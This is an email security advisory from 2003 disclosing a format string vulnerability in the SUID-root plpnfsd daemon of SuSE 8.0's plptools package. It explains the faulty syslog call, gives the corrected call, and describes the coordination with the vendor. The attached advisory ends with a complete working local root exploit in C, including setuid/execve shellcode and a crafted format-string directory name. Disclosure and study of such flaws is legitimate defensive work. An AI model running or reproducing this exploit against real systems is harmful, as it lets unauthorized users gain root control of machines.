Date: Wed, 29 Jan 2003 17:10:52 +0000
From: Carl Livitt <[email protected]>
To: [email protected]Subject: Local root vuln in SuSE 8.0 plptools package
--------------Boundary-00=_4QJHZ3XWC0E8WH2QXRYV
Content-Type: text/plain;
charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
Hi,
There is a vulnerability in the plptools (Psion tools) package of SuSE 8.=
0=20
(possibly others; this has not been researched).
Please see attached advisory for more details.
Regards,
Carl
--------------Boundary-00=_4QJHZ3XWC0E8WH2QXRYV
Content-Type: text/plain;
charset="us-ascii";
name="CLIVITT-2003-2 (SuSE 8.0 plptools).txt"
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="CLIVITT-2003-2 (SuSE 8.0 plptools).txt"
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
________________________________________________________________________
Security Vulnerability Advisory
________________________________________________________________________
Distribution: SuSE 8.0 (possibly other versions, eg. 7.x/8.1)
Package name: plptools-0.6mjg-161.i386.rpm
Impact: Local root
Advisory ID: CLIVITT-2003-2
Author: Carl Livitt (carl [at] learningshophull.co.uk)
Date: January 29th, 2003
________________________________________________________________________
Problem Description:
A vulnerability in plpnfsd, the daemon that lets you mount Psion
filesystems on your Linux workstation, allows a local attacker to gain
root privileges by passing a carefully crafted directory name to the
application.
This package is NOT installed by default, however the application is
exploitable under the default installation settings.
________________________________________________________________________
Problem Details:
A format string vulnerability in the logging functions of plpnfsd can
be exploited to overwrite arbitrary areas of memory with any value an
attacker wishes. Because the plpnfsd binary is installed SUID root,
this can lead to execution of arbitrary code with the privileges of the
root user.
In the sourcecode, the mpmain.c file contains the following vulnerable
functions:
int debuglog(char *fmt, ...)
int errorlog(char *fmt, ...)
int infolog(char *fmt, ...)
All are identical except for the syslog log level (LOG_INFO, LOG_DEBUG
etc). The exploitable code is:
buf = (char *)malloc(1024);
va_start(ap, fmt);
vsnprintf(buf, 1024, fmt, ap);
syslog(LOG_XXXXX, buf);
The last line should, of course, read:
syslog(LOG_XXXXX, "%s", buf);
All recent versions of plptools contain this fix, but the SuSE packages
have not been updated in a long time.
________________________________________________________________________
Updated Packages:
SuSE were contacted on 15/1/2003 and arranged for new packages to be
made available. The release date for this advisory was agreed to be
29/1/2003.
The updated packages will be downloadable from the SuSE web- and
FTP sites, although at the time of writing no packages are yet
available. Updated versions are expected to be ready very soon.
Alternatively, you can get the most recent sourcecode from the plptools
homepage:
http://plptools.sourceforge.net/
________________________________________________________________________
Advisory Author Details:
Email: carl at learningshophull dot co dot uk
PGP key:
- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v1.2.0 (GNU/Linux)
mQGiBD3rgEgRBACkZW1OlRo0Mn+4IZPQWynQ/H27aLysLrXk14fYQjABxhuyGfqA
N20xSXfpe236BncG0JgGZe1UYgbj1R08MAVnw6cVQGZENxSxs8hFcKClCMoWRqd1
LU/P3U1MmFJDztCZwjbg61jS0ajRjGRnzgrhxBCZDycD9onYP6BvXPuqqwCg2tPW
cJmRcLK5GggicNcV1ZQrG70D/3+FNc18TVbZ2/dUjb2Y5d9AGS86FFmQosiuHXpx
vgQgDseddEeCg/yxETqTAA+gOvY3NKm9wD6sCmakwqg1SYTpeswA8/3ceRaOjJjw
3VKPbZOSNubCl09Sgp0xqwiM6xSQxozvuQKoxB0zwvJrVEW7KIEG2aHEOocZsFYX
6IZ2A/9ePnfCOEAiTHs2+gYuoHXUs1+lXgLl1Qv+J0hHdNh50LT5aDx6ih39VXID
FiKPw3MMznDhdAOW6gOQEA3QJAEn8uQU66xGzlPEkefutWDibd+zT6O54z259xcv
9VTgiAiNThfucc+KyIA2SKro8FyEQzghZBM4v+sAnN9VZBITCbQpQ2FybCBMaXZp
dHQgPGNhcmxAbGVhcm5pbmdzaG9waHVsbC5jby51az6IXwQTEQIAHwUCPeuASAUJ
CWYBgAQLBwMCAxUCAwMWAgECHgECF4AACgkQMeVo6vqTjEsRiQCgiQaL0VSEiEMA
ZqKvsR8Ctg6y5QwAoNIOTj+CCyGXgys+3secZJLk03LMuQINBD3rgF0QCAC23Kb8
5HW36DuwtFlM1HJr2RAnbVxPlcmBWNMg+tJDFjGCVbMhiZOR7+4A+JpLNtkAJH8j
PGCexuBhlVTTgaA2uBwrIVLWDh41IvrZrhafqxhsUywtiGvd1CXD+s2hhvlMbof+
C/6cbOdriFv+qtJWOwc0i14tb2wA36k7yYdOl0X3+hBGiJyt1DnEQCnT6LanYYtF
GuvL7T8fO2LHYoTPSvMmdv6l4YSSw3WFXqoodaGeO1rah7cPeBk6+obDeRuzZiLV
hQxiB2OzNmF1P/NBNqKjUu2kgLrCV6KJtcpJLqgzYgy/p2vx6AXp4oOG74D2Xen/
/AzGO+FDCNt3Mhc7AAMFB/9DtD1Kq7F5QiYMvLYZGYA7LSiGb/oaq5wxaG5Mc09t
szqQZMDGVsyuBvJ/zI+YnsHS5yK0vnQ4vrZ2IoAyJAChAuI85yg6eh4tG93ZxhTa
xBJP9dep4H+cd/ZNawD35nMZte54TBylATezUBXSAecnCGNlY+0M9w4ijXujDAH/
2eq1S5pyc44sgUsvyXE+UVdOr4c5B5z9OxLynbpE98A11lJP/0NkRGRgVVykfdRw
8eq9DdaL9NIJyG5mkWEJLPf21vLKFxtU6eeHDVHfv33UiRPKZlFX6rddY6EaGUeS
a/HD2p/cA/7c5I/R5awZdmc9f7DZc4A6H6qfz6z8NNILiEwEGBECAAwFAj3rgF0F
CQlmAYAACgkQMeVo6vqTjEutUACghkYYFWPHLdF8IaqBRV7U086XYTsAoNVLwSAl
+Zf0MoBdqnGDxPXhfLch
=fp0k
- -----END PGP PUBLIC KEY BLOCK-----
________________________________________________________________________
Exploit Sourcecode:
/*
plpnfsd local r00t format string exploit for SuSE 8.0 (and others?)
By Carl Livitt (carl [at] learningshophull [d0t] co [d0t] uk)
To use:
gcc -o plp-exploit plp-exploit.c
./plp-exploit
The version of plptools that this exploits is ancient... SuSE never
got around to updating their packages, so I suppose this exploit
should work on most SuSE 7.x releases without too much modification.
New RPMs are available from www.suse.com - please upgrade asap.
----------
You may notice the format string has huge stack offsets in it. These
are due to the fact that the string we're exploiting does not let us
take control of the first 32 bits of data needed for a typical
exploit. So, instead, I put 256 copies of the address of my malicious
EIP into an environment variable and then refer to it by counting 700
words into the stack to get at it (%700$49125d etc). Another fun-to-write
exploit!
*/
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
// Saved EIP is at this addr on my SuSE 8.0 box
#define WRITE_ADDRESS_DEFINE 0xbfffee10
// Some stuff we need...
#define NUM_ADDRS 2048
#define PADDING 3
// Guess what this does?
char shellcode[] =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80" // setuid(0)
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh"; // aleph1 execve() of /bin/sh
char scbuf[1024];
char directory[]="%700$49125d%700$hn%700$15607d%450$hn";
main(int argc, char **argv) {
char buf[NUM_ADDRS*4];
char buf2[NUM_ADDRS*4];
int i;
unsigned long WRITE_ADDRESS=WRITE_ADDRESS_DEFINE;
char *env[]={ NULL, NULL, NULL, NULL };
char *prg[]={ "/bin/sh", "-c", NULL, NULL }; // yes, /bin/sh is correct!
char tmp[1024];
// shouldn't be necessary on SuSE 8.0
if(argc>1)
WRITE_ADDRESS=strtoul(argv[1], NULL, 16);
// create exploit directory containing format string
mkdir(directory,0777);
// build large buffers containing address of saved EIP
// end EIP+2. These will be placed into the environment
// of the spawned plpnfsd process and used by the exploit
// to determine where to place our malicious EIP.
i=PADDING;
while(i<(NUM_ADDRS/2)) {
buf[i]=WRITE_ADDRESS&0xff;
buf2[i++]=(WRITE_ADDRESS+2)&0xff;
buf[i]=(WRITE_ADDRESS>>8)&0xff;
buf2[i++]=(WRITE_ADDRESS+2>>8)&0xff;
buf[i]=(WRITE_ADDRESS>>16)&0xff;
buf2[i++]=(WRITE_ADDRESS+2>>16)&0xff;
buf[i]=(WRITE_ADDRESS>>24)&0xff;
buf2[i++]=(WRITE_ADDRESS+2>>24)&0xff;
}
// finish off the buffers...
buf[NUM_ADDRS-1]='\0';
buf2[NUM_ADDRS-1]='\0';
memcpy(buf, "AA=", PADDING);
memcpy(buf2, "BB=", PADDING);
// build the shellcode...
memset(scbuf, 0x90,1024);
memcpy(scbuf, "S=", 2);
memcpy(scbuf + 1024 - (strlen(shellcode)+1), shellcode, strlen(shellcode));
scbuf[1023]='\0';
// stick everything we need into the environment...
sprintf(tmp, "/usr/sbin/plpnfsd -d '%s'", directory);
prg[2]=strdup(tmp);
env[0]=strdup(scbuf);
env[1]=strdup(buf);
env[2]=strdup(buf2);
// display some info
printf("SuSE 8.0 /usr/sbin/plpnfsd exploit - by Carl Livitt.\n\n");
printf("Once you've typed 'exit' in the root shell, it will crash.\n");
printf("You must type these commands _before_ 'exit' if you want\n");
printf("to exit cleanly:\n killall -9 rpciod\n killall plpnfsd\n");
printf(" [now press enter a few times]\n exit\n [press enter again]\n\nBecoming r00t...\n");
// ...and finally, launch the exploit.
system("/usr/sbin/ncpd &> /dev/null"); // plpnfsd needs ncpd
execve(*prg, prg, env);
}
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.0 (GNU/Linux)
iD8DBQE+N76vMeVo6vqTjEsRAnq5AJ4n5ehR3efLPwH24sRLtL/83cZOUACgjLFH
qe2cG/pHhZlqAhGpwGmua5I=
=JBN/
-----END PGP SIGNATURE-----
--------------Boundary-00=_4QJHZ3XWC0E8WH2QXRYV--
